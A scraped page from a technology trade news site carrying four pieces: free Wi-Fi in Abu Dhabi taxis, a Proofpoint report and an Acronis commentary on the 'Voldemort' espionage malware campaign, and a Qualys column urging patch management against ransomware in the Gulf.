Connect with us

Technology

Abu Dhabi taxis to offer free Smart Wi-Fi service

Published

on

The Centre has officially announced its partnership with Telematics Networking & Communications LLC, in its rollout of Smart Wi-Fi across its entire fleet of taxi’s in the Emirate of Abu Dhabi.

Passengers riding the Centre’s fleet of taxis in Abu Dhabi will enjoy a free Smart Wi-Fi service while on board, the largest and most innovative of its kind in the world. The rollout of the service will begin in November this year and is expected to be completed across the Centre’s entire fleet by mid 2017.

At Gitex Technology Week, Jamal Al Nuaimi, General Manager of Etisalat, Abu Dhabi and Esam Al Mazroei, Vice Chairman of Telematics signed a five-year partnership agreement today. As part of the agreement, Etisalat, whose world-class network will power the high speed and secure Smart Wi-Fi service, will deliver its network services and sophisticated M2M platform – M2M control centre for the largest connected car platform in the region to Telematics, which will be deployed across the entire Abu Dhabi taxi fleet.

Telematics, together with its partner BlueGreen, have worked closely with the Centre to design this bespoke Smart Wi-Fi service, which, in addition to providing a secure and robust Wi-Fi network to passengers, will also offer Abu Dhabi, and indeed the UAE, the biggest mobile media service within taxis. The Wi-Fi service can be used to deliver smart value-added services, such as customer communication, satisfaction surveys, government citizen polls, as well as allowing businesses and brands the ability to gainfully engage with their consumers without any friction.

Speaking of this key initiative, Mr Mohammad Al Qamzi, General Manager of The Centre for Regulation of Transport by Hire Cars said, “The Centre is constantly striving to enhance the passenger experience it delivers in its taxis. We are pleased to partner with Telematics and BlueGreen to bring this world-class Smart Wi-Fi service to our passengers, who can now avail of constant connectivity in our taxis for free, and also enjoy the bespoke value-added services it will deliver. We are confident this service will enhance passenger satisfaction and happiness, and thereby increase the use of our excellent public taxi service in Abu Dhabi.”

On the occasion of the launch of the Smart Wi-Fi service, Jamal Saeed Al Nuaimi, General Manager of Etisalat- Abu Dhabi, said “UAE has always led the way in the region and globally to launch and implement smart technologies and services that make an impact in the way of life for residents in the country. Etisalat is today spearheading UAE’s smart city and digital transformation journey. We are proud to be associated with this strategic project that is a global first. This is set to transform the digital experience of passengers in Abu Dhabi taxis, and I am sure will set the benchmark for Smart Taxi services across the UAE.”

In line with its smart city solution portfolio, Telematics worked eagerly on this initiative to support “the visionary leadership of the UAE in its efforts to create innovative and world-class technological services that pave the way for building a knowledge-driven society,” said Esam Al Mazroei, Vice Chairman of Telematics. “We are very proud to be the key partner in this project, especially as a local technology company that strives to innovate in local and global markets.”

As announced in late September, the rollout will begin with Airport taxis and the Mercedes Vito Compact vans.

News

The Malware That Must Not Be Named: Suspected Espionage Campaign Delivers “Voldemort”

Published

on

Voldemort malware

In August 2024, Proofpoint researchers identified an unusual campaign using a novel attack chain to deliver custom malware. The threat actor named the malware “Voldemort” based on internal filenames and strings used in the malware. 

The attack chain comprises multiple techniques currently popular within the threat landscape as well as uncommon methods for command and control (C2), like the use of Google Sheets. Its combination of tactics, techniques, and procedures (TTPs), lure themes impersonating government agencies of various countries, and odd file naming and passwords like “test” are notable. Researchers initially suspected the activity may be a red team. However, the large volume of messages and analysis of the malware very quickly indicated it was a threat actor.  

Proofpoint assesses with moderate confidence this is likely an advanced persistent threat (APT) actor with the objective of intelligence gathering. However, Proofpoint does not have enough data to attribute with high confidence to a specific named threat actor (TA). Despite the widespread targeting and characteristics more typically aligned with cybercriminal activity, the nature of the activity and capabilities of the malware show more interest in espionage rather than financial gain at this time. 

Voldemort is a custom backdoor written in C. It has capabilities for information gathering and to drop additional payloads. Proofpoint observed Cobalt Strike hosted on the actor’s infrastructure, and it is likely that is one of the payloads that would be delivered.  

Beginning on 5 August 2024, the malicious activity included over 20,000 messages impacting over 70 organizations globally. The first wave of messages included a few hundred daily but then spiked on 17 August with nearly 6,000 total messages.  

Messages purported to be from various tax authorities notifying recipients about changes to their tax filings. Throughout the campaign, the actor impersonated tax agencies in the U.S. (Internal Revenue Service), the UK (HM Revenue & Customs), France (Direction Générale des Finances Publiques), Germany (Bundeszentralamt für Steuern), Italy (Agenzia delle Entrate), and from August 19, also India (Income Tax Department), and Japan (National Tax Agency). Each lure was customized and written in the language of the authority being impersonated. 

Proofpoint analysts correlated the language of the email with public information available on a select number of targets, finding that the threat actor targeted the intended victims with their country of residence rather than the country that the targeted organization operates in or country or language that could be extracted from the email address. For example, certain targets in a multi-national European organization received emails impersonating the IRS because their publicly available information linked them to the US. In some cases, it appears that the threat actor mixed up the country of residence for some victims when the target had the same (but uncommon) name as a more well-known person with a more public presence. Emails were sent from suspected compromised domains, with the actor including the agency’s real domain in the email address.

The threat actor targeted 18 different verticals, but nearly a quarter of the organizations targeted were insurance companies. Aerospace, transportation, and university entities made up the rest of the top 50% of organizations targeted by the threat actor.  

Proofpoint does not attribute this activity to a tracked threat actor. Based on the functionality of the malware and collected data observed when examining the Sheet, information gathering was one objective of this campaign. While many of the campaign characteristics align with cybercriminal threat activity, we assess this is likely espionage activity conducted to support as yet unknown final objectives.  

The Frankensteinian amalgamation of clever and sophisticated capabilities, paired with very basic techniques and functionality, makes it difficult to assess the level of the threat actor’s capability and determine with high confidence the ultimate goals of the campaign. It is possible that large numbers of emails could be used to obscure a smaller set of actual targets, but it’s equally possible the actors wanted to genuinely infect dozens of organizations. It is also possible that multiple threat actors with varying levels of experience in developing tooling and initial access worked on this activity. Overall, it stands out as an unusual campaign.   

The behavior combines a variety of recently popular techniques observed in several disparate campaigns from multiple cybercriminal threat actors that have used similar techniques as part of ongoing experimentation across the initial access ecosystem. Many of the techniques used in the campaign are observed more frequently in the cybercriminal landscape, demonstrating that actors engaging in suspected espionage activity often use the same TTPs as financially motivated threat actors. 

While the activity appears to align with espionage activity, it is possible that future activities associated with this threat cluster may change this assessment. In that case, it would indicate cybercriminal actors, while demonstrating some typical e-crime delivery characteristics, used customized malware with unusual features currently only available to the operators and not abused in widespread campaigns, as well as very specific targeting not normally seen in financially motivated campaigns. 

Defense against observed behaviors includes restricting access to external file sharing services to only known, safelisted servers; blocking network connections to TryCloudflare if it is not required for business purposes; and monitoring and alerting on use of search-ms in scripts and suspicious follow-on activity such as LNK and PowerShell execution. 

Proofpoint reached out to our industry colleagues about the activities in this report abusing their services, and their collaboration is appreciated. 

Continue Reading

Editorial

Voldemort Espionage Malware Campaign: A Familiar Threat with New Tricks

Published

on

Malware

By: Srijith Kn

The Voldemort espionage malware campaign, which has made headlines for its widespread infiltration of organizations worldwide, has raised significant concerns among cybersecurity experts. While the name may invoke a sense of dread, cybersecurity professionals are downplaying its novelty, pointing out that the tactics used by the attackers are not as groundbreaking as they may seem.

Kevin Reed, Chief Information Security Officer at Acronis, explained that the campaign uses a blend of well-established methods seen in previous cyberattacks. “This may sound alarming, but the techniques used are far from revolutionary,” Reed said. “What we’re seeing is a ‘Frankenstein’ approach — combining well-known tools and methods in a logical manner to increase the chances of system compromise.”

One of the more common tactics employed by the Voldemort campaign is the use of malicious PowerShell scripts, a long-standing favorite among cybercriminals. Reed emphasized the importance of proper detection mechanisms to counter these familiar threats. “We encounter these types of malicious scripts frequently,” he noted. “That’s why having robust detection systems, like script emulation technologies such as those found in Acronis Cyber Protect, is critical to neutralize the threat early.”

Despite this reliance on traditional methods, there is one aspect of the Voldemort campaign that has raised eyebrows: the use of Google Sheets as a command-and-control (C2) platform. While this might sound innovative, Reed explained that it’s simply the latest iteration of a tactic used by hackers to exploit user-generated content platforms.

“It’s somewhat unusual to see Google Sheets being used for C2,” Reed said. “But we’ve seen attackers leverage various online platforms for similar purposes before. Social media platforms, like Instagram, have been used in the past — with one high-profile example involving command-and-control messages hidden in the comments section of Britney Spears’ Instagram account.”

The campaign’s success, Reed argues, is less about innovation and more about the persistence and resourcefulness of cybercriminals. Still, the real takeaway from this attack, according to the Acronis expert, is the need for preparedness. “The most important thing is to be ready with advanced cybersecurity tools that can detect and neutralize these types of threats,” Reed said.

As the Voldemort campaign continues to develop, cybersecurity professionals remain focused on the importance of vigilance, investing in robust detection systems, and keeping up with the ever-evolving landscape of cyber threats.

Continue Reading

Features

Robust patch management. In the fight against ransomware, it’s time to get back to basics

Published

on

ransomware

By Saeed Abbasi, Product Manager, Vulnerability Research, Qualys Threat Research Unit (TRU)

In the Arab Gulf region, ransomware has become an epidemic. Since 2019, Saudi Arabia has been a top target for RansomOps gangs. And the GCC remained the most affected territory in the Middle East and Africa, as of 2023, showing a 65% increase over 2022 for instances of victims’ information being posted to data-leak sites. According to the Known Exploited Vulnerabilities (KEV) catalog, maintained by the Cybersecurity and Infrastructure Security Agency (CISA) under the U.S. Department of Homeland Security, approximately 20% of the 1,117 exploited vulnerabilities are linked to known ransomware campaigns. Attackers have become more relentless and more sophisticated, just as regional security teams have become more overworked and overwhelmed by their new hybrid infrastructures.

In today’s climate, senior executives approach discussions about cyber risk with the expectation of hearing unfavorable news. Indeed, matters have escalated of late with the emergence of human-mimicking AI. We used to take comfort in the fact that at least artificial intelligence could not be creative like people could. But that was before generative AI came along and left us speechless — with delight or dread, depending on our day job. For security professionals, it is the latter because every new technology that arrives will eventually get exploited by threat actors. AI and its generative subspecies can make it easier to find vulnerabilities, which implies there will be a surge in the volume of zero-days. And GenAI can pump out convincing phishing content at a scale unreachable by human criminals.

But in a break with tradition, I offer good news. In the daily struggle with ransomware threats, the answer lies in the daily fundamentals of IT admin. Patch management is the keystone of cyber resilience. As each vulnerability becomes known and fixes are released, that dreaded countdown begins again. Whether threat actors have beaten vendors to the punch by publishing an exploit before the patch was released or not, organizations must be prepared to act strategically when fixes become available. It may be that a patch fixes an error that poses no risk to the enterprise, in which case patching would not have much impact on reducing cyber risk. Hence, organizations need to look at prioritizing patching the assets that cause the most existential risk to the company, maximizing their patch rate (a measure of how effectively vulnerabilities are addressed) and minimizing their mean time to remediation (MTTR) for such “crown jewel” assets.

Windows mean doors

The Qualys Threat Research Unit (TRU) uses these metrics often in anonymized studies of organizations’ cyber-readiness. Our 2023 Qualys TruRisk Research Report found that weaponized vulnerabilities are patched within 30.6 days in 57.7% of cases, whereas attackers typically publish exploits for the same flaws inside just 19.5 days. That 11-day window is where our concerns should be concentrated. It should spur us to revisit patch management and — if we have not already — to integrate it into our cybersecurity strategy so we can start to close our open doors to attackers.

If we imagine a graph of MTTR plotted against patch rate for every vulnerability, then we can imagine four quadrants, defined by combinations of “high” or “low” for our two metrics. Our sweet spot is in the bottom righthand corner, where patch rate is high and MTTR is low. We could call this quadrant, the “Optimal Security Zone”. If a vulnerability is in this zone, we are unfazed by it. It is low-risk because it is patched and resolved quickly. In the top right, we find that patch rate is still high, so we call this the “Vigilant Alert Zone”, but incidents take a longer time to remediate (high MTTR). But while this is a higher source of concern, it is less worrying than if a vulnerability falls in the bottom left quadrant — the “Underestimated Risk Zone”. Here, we find overlooked vulnerabilities (low patch rates) but unexpectedly short remediation times. These flaws can quickly become risks if left unaddressed. Finally, we come to our red-flag quadrant, the “Critical Attention Zone” (top left), where vulnerabilities have low patch rates and take a long time to resolve.

Combining metrics like this can give us important crossover information that allows us to triage our patch management effectively. By exploring the critical areas first, we can examine overlooked vulnerabilities and discover either that they pose little threat and are less of a source of concern, or that they could lead to a ransomware incident, in which case they become a top priority on our to-do list. With RansomOps groups now leveraging advanced automation tools, the importance of optimal patch management cannot be overstated. Ensuring that systems are updated and secure is critical to prevent potential vulnerabilities.

Action stations

Starting today, then, GCC organizations should look to their vulnerability management strategy and determine an approach that is able to stand up to armies of threat actors, working as a unified industry, equipped with advanced AI, to disrupt, disable, and damage the region’s innovative spirit. We all need to make sure that our vulnerability gaps are closed and our defenses tightened against these malicious actors. Technical and business stakeholders must collaborate on crafting roadmaps that make sense to their operational uniqueness.

The hope remains that one day, cyber criminals, a persistent threat today, will be effectively countered by innovative security technologies. However, we must confront the fact that attackers are becoming more sophisticated, their campaigns are escalating in scope, and the resources available for cybersecurity defense are often constrained.

The solution does not lie in an unknowable panacea, but in the day-to-day fundamentals — robust patch management that uses the four-quadrant principle and aims for the highest possible patch rate and the shortest possible resolution time. The top practitioners in any field — sports, business, the arts — will always extol the virtues of the fundamentals. If it works for them, then why not for us? So, let’s get back to basics and send the ransomware actor packing.

Continue Reading

Trending

Please enable JavaScript in your browser to complete this form.

Copyright © 2023 | The Integrator